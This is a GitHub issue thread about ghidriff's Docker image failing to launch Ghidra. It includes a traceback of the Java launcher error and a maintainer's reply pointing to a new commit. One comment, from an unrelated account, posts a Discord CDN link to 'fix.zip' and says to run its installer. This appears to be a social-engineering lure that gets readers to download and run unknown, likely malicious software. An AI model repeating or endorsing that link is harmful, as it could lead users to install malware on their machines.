### ISSUE TITLE
Java process exit

### ISSUE THREAD

**Issue by syjzwjj** [clearbluejar/ghidriff#99]
When I use the docker Image (latest version), it encountered with error below:

```
zwjj@machine:~$ csudo docker run -it --rm -v $(pwd)/ghidriffs:/ghidriffs ghcr.io/clearbluejar/ghidriff:latest ghidriffs/1.dll ghidriffs/2.dll
INFO | ghidriff | Init Ghidra Diff Engine...
INFO | ghidriff | Engine Console Log: INFO
INFO | ghidriff | Engine File Log:  ghidriffs/ghidriff.log INFO
INFO | ghidriff | Starting Ghidra...
ERROR| pyhidra.launcher | An error occured launching Ghidra: Command 'java -cp "/home/zwjj/Downloads/ghidra_10.3.2_PUBLIC/support/LaunchSupport.jar" LaunchSupport "/home/zwjj/Downloads/ghidra_10.3.2_PUBLIC" -jdk_home -save' returned non-zero exit status 1.
Traceback (most recent call last):
  File "/usr/local/bin/ghidriff", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/ghidriff/__main__.py", line 53, in main
    d: GhidraDiffEngine = DiffEngine(args=args,
                          ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/ghidriff/ghidra_diff_engine.py", line 121, in __init__
    launcher.start()
  File "/usr/local/lib/python3.12/dist-packages/pyhidra/launcher.py", line 309, in start
    self._report_fatal_error("An error occured launching Ghidra", str(e), e)
  File "/usr/local/lib/python3.12/dist-packages/pyhidra/launcher.py", line 220, in _report_fatal_error
    raise cause
  File "/usr/local/lib/python3.12/dist-packages/pyhidra/launcher.py", line 260, in start
    os.environ['JAVA_HOME'] = str(self.java_home)
                                  ^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/pyhidra/launcher.py", line 159, in java_home
    home = subprocess.check_output(cmd, encoding="utf-8", shell=True)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/subprocess.py", line 466, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/subprocess.py", line 571, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'java -cp "/home/zwjj/Downloads/ghidra_10.3.2_PUBLIC/support/LaunchSupport.jar" LaunchSupport "/home/zwjj/Downloads/ghidra_10.3.2_PUBLIC" -jdk_home -save' returned non-zero exit status 1.
```

I've checked the jdk version inside docker images, seems it's jdk 11 and it's old? Have you ever encountered this issue before? Thanks!

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by clearbluejar** [comment]
Does the new version work?? https://github.com/clearbluejar/ghidriff/commit/3164a8e63b91b89cc7709e5593074587d0ab3ba1
